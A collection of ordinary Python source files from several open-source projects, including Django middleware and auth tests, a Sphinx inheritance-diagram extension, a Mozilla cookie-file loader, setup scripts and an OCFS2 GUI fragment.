def update(self, other=None, **kwargs):
# Make progressively weaker assumptions about "other"
if other is None:
pass
elif hasattr(other, 'iteritems'): # iteritems saves memory and lookups
for k, v in other.iteritems():
self[k] = v
elif hasattr(other, 'keys'):
for k in other.keys():
self[k] = other[k]
else:
for k, v in other:
self[k] = v
if kwargs:
self.update(kwargs)
def get(self, key, default=None):
try:
return self[key]
except KeyError:
return default
def __repr__(self):
return repr(dict(self.iteritems()))
def __cmp__(self, other):
if other is None:
return 1
if isinstance(other, DictMixin):
other = dict(other.iteritems())
return cmp(dict(self.iteritems()), other)
def __len__(self):
return len(self.keys())
|
cordery/django-countries-plus
|
refs/heads/master
|
countries_plus/middleware.py
|
1
|
import logging
from countries_plus.models import Country
logger = logging.getLogger(__name__)
class AddRequestCountryMiddleware(object):
def __init__(self, get_response=None):
self.get_response = get_response
def __call__(self, request):
country = Country.get_by_request(request)
if country:
request.country = country
else:
logger.warning('countries_plus: Could not retrieve country, not adding to request.')
return self.get_response(request)
|
mnach/suds-py3k
|
refs/heads/master
|
setup.py
|
1
|
#!/usr/bin/python
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
import sys
import suds
from setuptools import setup, find_packages
setup(
name="suds-py3k",
version=suds.__version__,
description="Lightweight SOAP client",
author="Jeff Ortel",
author_email="jortel@redhat.com",
maintainer="Jeff Ortel",
maintainer_email="jortel@redhat.com",
packages=find_packages(exclude=['tests']),
url="https://fedorahosted.org/suds",
)
|
cpcloud/PyTables
|
refs/heads/develop
|
doc/sphinxext/inheritance_diagram.py
|
98
|
"""
Defines a docutils directive for inserting inheritance diagrams.
Provide the directive with one or more classes or modules (separated
by whitespace). For modules, all of the classes in that module will
be used.
Example::
Given the following classes:
class A: pass
class B(A): pass
class C(A): pass
class D(B, C): pass
class E(B): pass
.. inheritance-diagram: D E
Produces a graph like the following:
A
/ \
B C
/ \ /
E D
The graph is inserted as a PNG+image map into HTML and a PDF in
LaTeX.
"""
import inspect
import os
import re
import subprocess
try:
from hashlib import md5
except ImportError:
from md5 import md5
from docutils.nodes import Body, Element
from docutils.parsers.rst import directives
from sphinx.roles import xfileref_role
def my_import(name):
"""Module importer - taken from the python documentation.
This function allows importing names with dots in them."""
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
class DotException(Exception):
pass
class InheritanceGraph(object):
"""
Given a list of classes, determines the set of classes that
they inherit from all the way to the root "object", and then
is able to generate a graphviz dot graph from them.
"""
def __init__(self, class_names, show_builtins=False):
"""
*class_names* is a list of child classes to show bases from.
If *show_builtins* is True, then Python builtins will be shown
in the graph.
"""
self.class_names = class_names
self.classes = self._import_classes(class_names)
self.all_classes = self._all_classes(self.classes)
if len(self.all_classes) == 0:
raise ValueError("No classes found for inheritance diagram")
self.show_builtins = show_builtins
py_sig_re = re.compile(r'''^([\w.]*\.)? # class names
(\w+) \s* $ # optionally arguments
''', re.VERBOSE)
def _import_class_or_module(self, name):
"""
Import a class using its fully-qualified *name*.
"""
try:
path, base = self.py_sig_re.match(name).groups()
except:
raise ValueError(
"Invalid class or module '%s' specified for inheritance diagram" % name)
fullname = (path or '') + base
path = (path and path.rstrip('.'))
if not path:
path = base
try:
module = __import__(path, None, None, [])
# We must do an import of the fully qualified name. Otherwise if a
# subpackage 'a.b' is requested where 'import a' does NOT provide
# 'a.b' automatically, then 'a.b' will not be found below. This
# second call will force the equivalent of 'import a.b' to happen
# after the top-level import above.
my_import(fullname)
except ImportError:
raise ValueError(
"Could not import class or module '%s' specified for inheritance diagram" % name)
try:
todoc = module
for comp in fullname.split('.')[1:]:
todoc = getattr(todoc, comp)
except AttributeError:
raise ValueError(
"Could not find class or module '%s' specified for inheritance diagram" % name)
# If a class, just return it
if inspect.isclass(todoc):
return [todoc]
elif inspect.ismodule(todoc):
classes = []
for cls in todoc.__dict__.values():
if inspect.isclass(cls) and cls.__module__ == todoc.__name__:
classes.append(cls)
return classes
raise ValueError(
"'%s' does not resolve to a class or module" % name)
def _import_classes(self, class_names):
"""
Import a list of classes.
"""
classes = []
for name in class_names:
classes.extend(self._import_class_or_module(name))
return classes
def _all_classes(self, classes):
"""
Return a list of all classes that are ancestors of *classes*.
"""
all_classes = {}
def recurse(cls):
all_classes[cls] = None
for c in cls.__bases__:
if c not in all_classes:
recurse(c)
for cls in classes:
recurse(cls)
return all_classes.keys()
def class_name(self, cls, parts=0):
"""
Given a class object, return a fully-qualified name. This
works for things I've tested in matplotlib so far, but may not
be completely general.
"""
module = cls.__module__
if module == '__builtin__':
fullname = cls.__name__
else:
fullname = "%s.%s" % (module, cls.__name__)
if parts == 0:
return fullname
name_parts = fullname.split('.')
return '.'.join(name_parts[-parts:])
def get_all_class_names(self):
"""
Get all of the class names involved in the graph.
"""
return [self.class_name(x) for x in self.all_classes]
# These are the default options for graphviz
default_graph_options = {
"rankdir": "LR",
"size": '"8.0, 12.0"'
}
default_node_options = {
"shape": "box",
"fontsize": 10,
"height": 0.25,
"fontname": "Vera Sans, DejaVu Sans, Liberation Sans, Arial, Helvetica, sans",
"style": '"setlinewidth(0.5)"'
}
default_edge_options = {
"arrowsize": 0.5,
"style": '"setlinewidth(0.5)"'
}
def _format_node_options(self, options):
return ','.join(["%s=%s" % x for x in options.items()])
def _format_graph_options(self, options):
return ''.join(["%s=%s;\n" % x for x in options.items()])
def generate_dot(self, fd, name, parts=0, urls={},
graph_options={}, node_options={},
edge_options={}):
"""
Generate a graphviz dot graph from the classes that
were passed in to __init__.
*fd* is a Python file-like object to write to.
*name* is the name of the graph
*urls* is a dictionary mapping class names to http urls
*graph_options*, *node_options*, *edge_options* are
dictionaries containing key/value pairs to pass on as graphviz
properties.
"""
g_options = self.default_graph_options.copy()
g_options.update(graph_options)
n_options = self.default_node_options.copy()
n_options.update(node_options)
e_options = self.default_edge_options.copy()
e_options.update(edge_options)
fd.write('digraph %s {\n' % name)
fd.write(self._format_graph_options(g_options))
for cls in self.all_classes:
if not self.show_builtins and cls in __builtins__.values():
continue
name = self.class_name(cls, parts)
# Write the node
this_node_options = n_options.copy()
url = urls.get(self.class_name(cls))
if url is not None:
this_node_options['URL'] = '"%s"' % url
fd.write(' "%s" [%s];\n' %
(name, self._format_node_options(this_node_options)))
# Write the edges
for base in cls.__bases__:
if not self.show_builtins and base in __builtins__.values():
continue
base_name = self.class_name(base, parts)
fd.write(' "%s" -> "%s" [%s];\n' %
(base_name, name,
self._format_node_options(e_options)))
fd.write('}\n')
def run_dot(self, args, name, parts=0, urls={},
graph_options={}, node_options={}, edge_options={}):
"""
Run graphviz 'dot' over this graph, returning whatever 'dot'
writes to stdout.
*args* will be passed along as commandline arguments.
*name* is the name of the graph
*urls* is a dictionary mapping class names to http urls
Raises DotException for any of the many os and
installation-related errors that may occur.
"""
try:
dot = subprocess.Popen(['dot'] + list(args),
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=True)
except OSError:
raise DotException("Could not execute 'dot'. Are you sure you have 'graphviz' installed?")
except ValueError:
raise DotException("'dot' called with invalid arguments")
except:
raise DotException("Unexpected error calling 'dot'")
self.generate_dot(dot.stdin, name, parts, urls, graph_options,
node_options, edge_options)
dot.stdin.close()
result = dot.stdout.read()
returncode = dot.wait()
if returncode != 0:
raise DotException("'dot' returned the errorcode %d" % returncode)
return result
class inheritance_diagram(Body, Element):
"""
A docutils node to use as a placeholder for the inheritance
diagram.
"""
pass
def inheritance_diagram_directive(name, arguments, options, content, lineno,
content_offset, block_text, state,
state_machine):
"""
Run when the inheritance_diagram directive is first encountered.
"""
node = inheritance_diagram()
class_names = arguments
# Create a graph starting with the list of classes
graph = InheritanceGraph(class_names)
# Create xref nodes for each target of the graph's image map and
# add them to the doc tree so that Sphinx can resolve the
# references to real URLs later. These nodes will eventually be
# removed from the doctree after we're done with them.
for name in graph.get_all_class_names():
refnodes, x = xfileref_role(
'class', ':class:`%s`' % name, name, 0, state)
node.extend(refnodes)
# Store the graph object so we can use it to generate the
# dot file later
node['graph'] = graph
# Store the original content for use as a hash
node['parts'] = options.get('parts', 0)
node['content'] = " ".join(class_names)
return [node]
def get_graph_hash(node):
return md5(node['content'] + str(node['parts'])).hexdigest()[-10:]
def html_output_graph(self, node):
"""
Output the graph for HTML. This will insert a PNG with clickable
image map.
"""
graph = node['graph']
parts = node['parts']
graph_hash = get_graph_hash(node)
name = "inheritance%s" % graph_hash
path = '_images'
dest_path = os.path.join(setup.app.builder.outdir, path)
if not os.path.exists(dest_path):
os.makedirs(dest_path)
png_path = os.path.join(dest_path, name + ".png")
path = setup.app.builder.imgpath
# Create a mapping from fully-qualified class names to URLs.
urls = {}
for child in node:
if child.get('refuri') is not None:
urls[child['reftitle']] = child.get('refuri')
elif child.get('refid') is not None:
urls[child['reftitle']] = '#' + child.get('refid')
# These arguments to dot will save a PNG file to disk and write
# an HTML image map to stdout.
image_map = graph.run_dot(['-Tpng', '-o%s' % png_path, '-Tcmapx'],
name, parts, urls)
return ('<img src="%s/%s.png" usemap="#%s" class="inheritance"/>%s' %
(path, name, name, image_map))
def latex_output_graph(self, node):
"""
Output the graph for LaTeX. This will insert a PDF.
"""
graph = node['graph']
parts = node['parts']
graph_hash = get_graph_hash(node)
name = "inheritance%s" % graph_hash
dest_path = os.path.abspath(os.path.join(setup.app.builder.outdir, '_images'))
if not os.path.exists(dest_path):
os.makedirs(dest_path)
pdf_path = os.path.abspath(os.path.join(dest_path, name + ".pdf"))
graph.run_dot(['-Tpdf', '-o%s' % pdf_path],
name, parts, graph_options={'size': '"6.0,6.0"'})
return '\n\\includegraphics{%s}\n\n' % pdf_path
def visit_inheritance_diagram(inner_func):
"""
This is just a wrapper around html/latex_output_graph to make it
easier to handle errors and insert warnings.
"""
def visitor(self, node):
try:
content = inner_func(self, node)
except DotException, e:
# Insert the exception as a warning in the document
warning = self.document.reporter.warning(str(e), line=node.line)
warning.parent = node
node.children = [warning]
else:
source = self.document.attributes['source']
self.body.append(content)
node.children = []
return visitor
def do_nothing(self, node):
pass
def setup(app):
setup.app = app
setup.confdir = app.confdir
app.add_node(
inheritance_diagram,
latex=(visit_inheritance_diagram(latex_output_graph), do_nothing),
html=(visit_inheritance_diagram(html_output_graph), do_nothing))
app.add_directive(
'inheritance-diagram', inheritance_diagram_directive,
False, (1, 100, 0), parts = directives.nonnegative_int)
|
bob-white/UnityIronPythonConsole
|
refs/heads/master
|
Assets/IronPythonConsole/Plugins/Lib/_MozillaCookieJar.py
|
191
|
"""Mozilla / Netscape cookie loading / saving."""
import re, time
from cookielib import (_warn_unhandled_exception, FileCookieJar, LoadError,
Cookie, MISSING_FILENAME_TEXT)
class MozillaCookieJar(FileCookieJar):
"""
WARNING: you may want to backup your browser's cookies file if you use
this class to save cookies. I *think* it works, but there have been
bugs in the past!
This class differs from CookieJar only in the format it uses to save and
load cookies to and from a file. This class uses the Mozilla/Netscape
`cookies.txt' format. lynx uses this file format, too.
Don't expect cookies saved while the browser is running to be noticed by
the browser (in fact, Mozilla on unix will overwrite your saved cookies if
you change them on disk while it's running; on Windows, you probably can't
save at all while the browser is running).
Note that the Mozilla/Netscape format will downgrade RFC2965 cookies to
Netscape cookies on saving.
In particular, the cookie version and port number information is lost,
together with information about whether or not Path, Port and Discard were
specified by the Set-Cookie2 (or Set-Cookie) header, and whether or not the
domain as set in the HTTP header started with a dot (yes, I'm aware some
domains in Netscape files start with a dot and some don't -- trust me, you
really don't want to know any more about this).
Note that though Mozilla and Netscape use the same format, they use
slightly different headers. The class saves cookies using the Netscape
header by default (Mozilla can cope with that).
"""
magic_re = "#( Netscape)? HTTP Cookie File"
header = """\
# Netscape HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
"""
def _really_load(self, f, filename, ignore_discard, ignore_expires):
now = time.time()
magic = f.readline()
if not re.search(self.magic_re, magic):
f.close()
raise LoadError(
"%r does not look like a Netscape format cookies file" %
filename)
try:
while 1:
line = f.readline()
if line == "": break
# last field may be absent, so keep any trailing tab
if line.endswith("\n"): line = line[:-1]
# skip comments and blank lines XXX what is $ for?
if (line.strip().startswith(("#", "$")) or
line.strip() == ""):
continue
domain, domain_specified, path, secure, expires, name, value = \
line.split("\t")
secure = (secure == "TRUE")
domain_specified = (domain_specified == "TRUE")
if name == "":
# cookies.txt regards 'Set-Cookie: foo' as a cookie
# with no name, whereas cookielib regards it as a
# cookie with no value.
name = value
value = None
initial_dot = domain.startswith(".")
assert domain_specified == initial_dot
discard = False
if expires == "":
expires = None
discard = True
# assume path_specified is false
c = Cookie(0, name, value,
None, False,
domain, domain_specified, initial_dot,
path, False,
secure,
expires,
discard,
None,
None,
{})
if not ignore_discard and c.discard:
continue
if not ignore_expires and c.is_expired(now):
continue
self.set_cookie(c)
except IOError:
raise
except Exception:
_warn_unhandled_exception()
raise LoadError("invalid Netscape format cookies file %r: %r" %
(filename, line))
def save(self, filename=None, ignore_discard=False, ignore_expires=False):
if filename is None:
if self.filename is not None: filename = self.filename
else: raise ValueError(MISSING_FILENAME_TEXT)
f = open(filename, "w")
try:
f.write(self.header)
now = time.time()
for cookie in self:
if not ignore_discard and cookie.discard:
continue
if not ignore_expires and cookie.is_expired(now):
continue
if cookie.secure: secure = "TRUE"
else: secure = "FALSE"
if cookie.domain.startswith("."): initial_dot = "TRUE"
else: initial_dot = "FALSE"
if cookie.expires is not None:
expires = str(cookie.expires)
else:
expires = ""
if cookie.value is None:
# cookies.txt regards 'Set-Cookie: foo' as a cookie
# with no name, whereas cookielib regards it as a
# cookie with no value.
name = ""
value = cookie.name
else:
name = cookie.name
value = cookie.value
f.write(
"\t".join([cookie.domain, initial_dot, cookie.path,
secure, expires, name, value])+
"\n")
finally:
f.close()
|
doudz/checkfeedmail
|
refs/heads/master
|
setup.py
|
1
|
# -*- coding: cp1252 -*-
## Copyright (c) 2007, Sébastien Ramage
##
## All rights reserved.
##
## Redistribution and use in source and binary forms, with or without modification,
## are permitted provided that the following conditions are met:
##
## * Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
##
## * Redistributions in binary form must reproduce the above copyright notice,
## this list of conditions and the following disclaimer in the documentation
## and/or other materials provided with the distribution.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
## PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
## LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
## NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
## SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from distutils.core import setup
import py2exe
import sys
import os
# If run without args, build executables, in quiet mode.
if len(sys.argv) == 1:
sys.argv.append("py2exe")
sys.argv.append("-q")
class Target:
def __init__(self, **kw):
self.__dict__.update(kw)
# for the versioninfo resources
self.version = "0.4.2"
self.company_name = "Sébastien Ramage"
self.copyright = "Sébastien Ramage 2007"
self.name = "checkfeedmail"
################################################################
# A program using wxPython
# The manifest will be inserted as resource into test_wx.exe. This
# gives the controls the Windows XP appearance (if run on XP ;-)
#
# Another option would be to store it in a file named
# test_wx.exe.manifest, and copy it with the data_files option into
# the dist-dir.
#
manifest_template = '''
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="5.0.0.0"
processorArchitecture="x86"
name="%(prog)s"
type="win32"
/>
<description>%(prog)s Program</description>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="X86"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
'''
RT_MANIFEST = 24
test_wx = Target(
# used for the versioninfo resource
description = "Notificateur de courrier électronique",
# what to build
script = "checkfeedmail.pyw",
other_resources = [(RT_MANIFEST, 1, manifest_template % dict(prog="checkfeedmail"))],
icon_resources = [(1, "mail.ico")],
dest_base = "checkfeedmail")
################################################################
setup(
options = {"py2exe": {"compressed": 1,
"optimize": 2,
"ascii": 1,
"bundle_files": 1,
"packages": ["encodings"],}},
zipfile = None,
windows = [test_wx],
data_files=[("",["C:\Python25\lib\site-packages\wx-2.8-msw-ansi\wx\MSVCP71.dll",
"C:\Python25\lib\site-packages\wx-2.8-msw-ansi\wx\gdiplus.dll",
"notification.wav",
"newsalert.wav",
"silkyalert.wav",
"zoombonus.wav",
"goodmorning.wav",
"harmony.wav",
])]
)
os.startfile("checkfeedmail.iss","compile")
|
mskcc/iCallSV
|
refs/heads/master
|
iCallSV/helper.py
|
2
|
"""
helper
~~~~~~~~~~~~~~~
:Description: helper has many utilities for iCallSV
"""
'''
Created on February 2, 2017
Description: helper has many utilities for iCallSV
@author: Ronak H Shah
A) make_empty_output: Will make an empty output file with header
::Input::
outFile: string containing path to write the output
::Output::
outputFile: File with following header
"TumorId\tNormalId\tChr1\tPos1\tChr2\tPos2\tSV_Type\tGene1\tGene2\tTranscript1\tTranscript2\tSite1Description\tSite2Description\tFusion\tProbabilityScore\tConfidence\tComments\tConnection_Type\tSV_LENGTH\tMAPQ\tPairEndReadSupport\tSplitReadSupport\tBrkptType\tConsensusSequence\tTumorVariantCount\tTumorSplitVariantCount\tTumorReadCount\tTumorGenotypeQScore\tNormalVariantCount\tNormalSplitVariantCount\tNormalReadCount\tNormalGenotypeQScorerepName-repClass-repFamily:-site1\trepName-repClass-repFamily:-site2\tCC_Chr_Band\tCC_Tumour_Types(Somatic)\tCC_Cancer_Syndrome\tCC_Mutation_Type\tCC_Translocation_Partner\tDGv_Name-DGv_VarType-site1\tDGv_Name-DGv_VarType-site2\n";
'''
import os
import tempfile
os.environ['MPLCONFIGDIR'] = tempfile.mkdtemp() #So that matplotlib doesnot complain stale file handle
try:
import pandas as pd
except ImportError, e:
print "helper: pandas is not installed, please install pandas as it is required to run the mapping."
sys.exit(1)
def make_empty_outputfile(outFile):
outDF = pd.DataFrame(
columns=[
"TumorId",
"NormalId",
"Chr1",
"Pos1",
"Chr2",
"Pos2",
"SV_Type",
"Gene1",
"Gene2",
"Transcript1",
"Transcript2",
"Site1Description",
"Site2Description",
"Fusion",
"ProbabilityScore",
"Confidence",
"Comments",
"Connection_Type",
"SV_LENGTH",
"MAPQ",
"PairEndReadSupport",
"SplitReadSupport",
"BrkptType",
"ConsensusSequence",
"TumorReferenceCount",
"TumorSplitReferenceCount",
"TumorVariantCount",
"TumorSplitVariantCount",
"TumorReadCount",
"TumorGenotypeQScore",
"NormalReferenceCount",
"NormalSplitReferenceCount",
"NormalVariantCount",
"NormalSplitVariantCount",
"NormalReadCount",
"NormalGenotypeQScore",
"Cosmic_Fusion_Counts",
"repName-repClass-repFamily:-site1",
"repName-repClass-repFamily:-site2",
"CC_Chr_Band",
"CC_Tumour_Types(Somatic)",
"CC_Cancer_Syndrome",
"CC_Mutation_Type",
"CC_Translocation_Partner",
"DGv_Name-DGv_VarType-site1",
"DGv_Name-DGv_VarType-site2"])
outDF.to_csv(outFile, sep='\t', index=False)
|
zhoulingjun/django
|
refs/heads/master
|
tests/auth_tests/test_remote_user.py
|
275
|
from datetime import datetime
from django.conf import settings
from django.contrib.auth import authenticate
from django.contrib.auth.backends import RemoteUserBackend
from django.contrib.auth.middleware import RemoteUserMiddleware
from django.contrib.auth.models import User
from django.test import TestCase, modify_settings, override_settings
from django.utils import timezone
@override_settings(ROOT_URLCONF='auth_tests.urls')
class RemoteUserTest(TestCase):
middleware = 'django.contrib.auth.middleware.RemoteUserMiddleware'
backend = 'django.contrib.auth.backends.RemoteUserBackend'
header = 'REMOTE_USER'
# Usernames to be passed in REMOTE_USER for the test_known_user test case.
known_user = 'knownuser'
known_user2 = 'knownuser2'
def setUp(self):
self.patched_settings = modify_settings(
AUTHENTICATION_BACKENDS={'append': self.backend},
MIDDLEWARE_CLASSES={'append': self.middleware},
)
self.patched_settings.enable()
def tearDown(self):
self.patched_settings.disable()
def test_no_remote_user(self):
"""
Tests requests where no remote user is specified and insures that no
users get created.
"""
num_users = User.objects.count()
response = self.client.get('/remote_user/')
self.assertTrue(response.context['user'].is_anonymous())
self.assertEqual(User.objects.count(), num_users)
response = self.client.get('/remote_user/', **{self.header: None})
self.assertTrue(response.context['user'].is_anonymous())
self.assertEqual(User.objects.count(), num_users)
response = self.client.get('/remote_user/', **{self.header: ''})
self.assertTrue(response.context['user'].is_anonymous())
self.assertEqual(User.objects.count(), num_users)
def test_unknown_user(self):
"""
Tests the case where the username passed in the header does not exist
as a User.
"""
num_users = User.objects.count()
response = self.client.get('/remote_user/', **{self.header: 'newuser'})
self.assertEqual(response.context['user'].username, 'newuser')
self.assertEqual(User.objects.count(), num_users + 1)
User.objects.get(username='newuser')
# Another request with same user should not create any new users.
response = self.client.get('/remote_user/', **{self.header: 'newuser'})
self.assertEqual(User.objects.count(), num_users + 1)
def test_known_user(self):
"""
Tests the case where the username passed in the header is a valid User.
"""
User.objects.create(username='knownuser')
User.objects.create(username='knownuser2')
num_users = User.objects.count()
response = self.client.get('/remote_user/',
**{self.header: self.known_user})
self.assertEqual(response.context['user'].username, 'knownuser')
self.assertEqual(User.objects.count(), num_users)
# Test that a different user passed in the headers causes the new user
# to be logged in.
response = self.client.get('/remote_user/',
**{self.header: self.known_user2})
self.assertEqual(response.context['user'].username, 'knownuser2')
self.assertEqual(User.objects.count(), num_users)
def test_last_login(self):
"""
Tests that a user's last_login is set the first time they make a
request but not updated in subsequent requests with the same session.
"""
user = User.objects.create(username='knownuser')
# Set last_login to something so we can determine if it changes.
default_login = datetime(2000, 1, 1)
if settings.USE_TZ:
default_login = default_login.replace(tzinfo=timezone.utc)
user.last_login = default_login
user.save()
response = self.client.get('/remote_user/',
**{self.header: self.known_user})
self.assertNotEqual(default_login, response.context['user'].last_login)
user = User.objects.get(username='knownuser')
user.last_login = default_login
user.save()
response = self.client.get('/remote_user/',
**{self.header: self.known_user})
self.assertEqual(default_login, response.context['user'].last_login)
def test_header_disappears(self):
"""
Tests that a logged in user is logged out automatically when
the REMOTE_USER header disappears during the same browser session.
"""
User.objects.create(username='knownuser')
# Known user authenticates
response = self.client.get('/remote_user/',
**{self.header: self.known_user})
self.assertEqual(response.context['user'].username, 'knownuser')
# During the session, the REMOTE_USER header disappears. Should trigger logout.
response = self.client.get('/remote_user/')
self.assertEqual(response.context['user'].is_anonymous(), True)
# verify the remoteuser middleware will not remove a user
# authenticated via another backend
User.objects.create_user(username='modeluser', password='foo')
self.client.login(username='modeluser', password='foo')
authenticate(username='modeluser', password='foo')
response = self.client.get('/remote_user/')
self.assertEqual(response.context['user'].username, 'modeluser')
def test_user_switch_forces_new_login(self):
"""
Tests that if the username in the header changes between requests
that the original user is logged out
"""
User.objects.create(username='knownuser')
# Known user authenticates
response = self.client.get('/remote_user/',
**{self.header: self.known_user})
self.assertEqual(response.context['user'].username, 'knownuser')
# During the session, the REMOTE_USER changes to a different user.
response = self.client.get('/remote_user/',
**{self.header: "newnewuser"})
# Ensure that the current user is not the prior remote_user
# In backends that create a new user, username is "newnewuser"
# In backends that do not create new users, it is '' (anonymous user)
self.assertNotEqual(response.context['user'].username, 'knownuser')
class RemoteUserNoCreateBackend(RemoteUserBackend):
"""Backend that doesn't create unknown users."""
create_unknown_user = False
class RemoteUserNoCreateTest(RemoteUserTest):
"""
Contains the same tests as RemoteUserTest, but using a custom auth backend
class that doesn't create unknown users.
"""
backend = 'auth_tests.test_remote_user.RemoteUserNoCreateBackend'
def test_unknown_user(self):
num_users = User.objects.count()
response = self.client.get('/remote_user/', **{self.header: 'newuser'})
self.assertTrue(response.context['user'].is_anonymous())
self.assertEqual(User.objects.count(), num_users)
class CustomRemoteUserBackend(RemoteUserBackend):
"""
Backend that overrides RemoteUserBackend methods.
"""
def clean_username(self, username):
"""
Grabs username before the @ character.
"""
return username.split('@')[0]
def configure_user(self, user):
"""
Sets user's email address.
"""
user.email = 'user@example.com'
user.save()
return user
class RemoteUserCustomTest(RemoteUserTest):
"""
Tests a custom RemoteUserBackend subclass that overrides the clean_username
and configure_user methods.
"""
backend = 'auth_tests.test_remote_user.CustomRemoteUserBackend'
# REMOTE_USER strings with email addresses for the custom backend to
# clean.
known_user = 'knownuser@example.com'
known_user2 = 'knownuser2@example.com'
def test_known_user(self):
"""
The strings passed in REMOTE_USER should be cleaned and the known users
should not have been configured with an email address.
"""
super(RemoteUserCustomTest, self).test_known_user()
self.assertEqual(User.objects.get(username='knownuser').email, '')
self.assertEqual(User.objects.get(username='knownuser2').email, '')
def test_unknown_user(self):
"""
The unknown user created should be configured with an email address.
"""
super(RemoteUserCustomTest, self).test_unknown_user()
newuser = User.objects.get(username='newuser')
self.assertEqual(newuser.email, 'user@example.com')
class CustomHeaderMiddleware(RemoteUserMiddleware):
"""
Middleware that overrides custom HTTP auth user header.
"""
header = 'HTTP_AUTHUSER'
class CustomHeaderRemoteUserTest(RemoteUserTest):
"""
Tests a custom RemoteUserMiddleware subclass with custom HTTP auth user
header.
"""
middleware = (
'auth_tests.test_remote_user.CustomHeaderMiddleware'
)
header = 'HTTP_AUTHUSER'
class PersistentRemoteUserTest(RemoteUserTest):
"""
PersistentRemoteUserMiddleware keeps the user logged in even if the
subsequent calls do not contain the header value.
"""
middleware = 'django.contrib.auth.middleware.PersistentRemoteUserMiddleware'
require_header = False
def test_header_disappears(self):
"""
A logged in user is kept logged in even if the REMOTE_USER header
disappears during the same browser session.
"""
User.objects.create(username='knownuser')
# Known user authenticates
response = self.client.get('/remote_user/', **{self.header: self.known_user})
self.assertEqual(response.context['user'].username, 'knownuser')
# Should stay logged in if the REMOTE_USER header disappears.
response = self.client.get('/remote_user/')
self.assertEqual(response.context['user'].is_anonymous(), False)
self.assertEqual(response.context['user'].username, 'knownuser')
|
abligh/ocfs2-tools
|
refs/heads/ubuntu-precise-1.8.2
|
ocfs2console/ocfs2interface/bosa.py
|
8
|
# OCFS2Console - GUI frontend for OCFS2 management and debugging
# Copyright (C) 2002, 2005 Oracle. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 021110-1307, USA.
import gtk
import gobject
import pango
import ocfs2
try:
IdleBase = gobject.Idle
except AttributeError:
import gidle
IdleBase = gidle.Idle
from guiutil import set_props
from ls import fields
INFO_LABEL_FONT = pango.FontDescription('monospace')
(
COLUMN_NAME,
COLUMN_INFO_OBJECT,
COLUMN_ICON,
COLUMN_ITALIC
) = range(4)
STOCK_LOADING = gtk.STOCK_REFRESH
STOCK_EMPTY = gtk.STOCK_STOP
STOCK_ERROR = gtk.STOCK_DIALOG_ERROR
try:
STOCK_FILE = gtk.STOCK_FILE
except AttributeError:
STOCK_FILE = gtk.STOCK_NEW
try:
STOCK_DIRECTORY = gtk.STOCK_DIRECTORY
except AttributeError:
STOCK_DIRECTORY = gtk.STOCK_OPEN
INVALID_DENTRY = 'poop'
class InfoLabel(gtk.Label):
def __init__(self, field_type):
gtk.Label.__init__(self)
self.set_selectable(True)
self.field_type = field_type
if field_type.right_justify:
set_props(self, xalign=1.0)
else:
set_props(self, xalign=0.0)
self.modify_font(INFO_LABEL_FONT)
if hasattr(field_type, 'width_chars'):
context = self.get_pango_context()
desc = INFO_LABEL_FONT.copy()
desc.set_size(context.get_font_description().get_size())
metrics = context.get_metrics(desc, context.get_language())
char_width = metrics.get_approximate_char_width()
digit_width = metrics.get_approximate_digit_width()
char_pixels = pango.PIXELS(max(char_width, digit_width))
self.set_size_request(char_pixels * field_type.width_chars, -1)
def update(self, dentry, dinode):
field = self.field_type(dentry, dinode)
self.set_text(field.text)
def clear(self):
self.set_text('')
class Browser(gtk.VBox):
def __init__(self, device=None):
self.device = device
gtk.VBox.__init__(self, spacing=4)
label = gtk.Label('/')
set_props(label, xalign=0.0,
selectable=True,
wrap=True)
self.pack_start(label, expand=False)
self.path_label = label
self.scrl_win = gtk.ScrolledWindow()
self.scrl_win.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
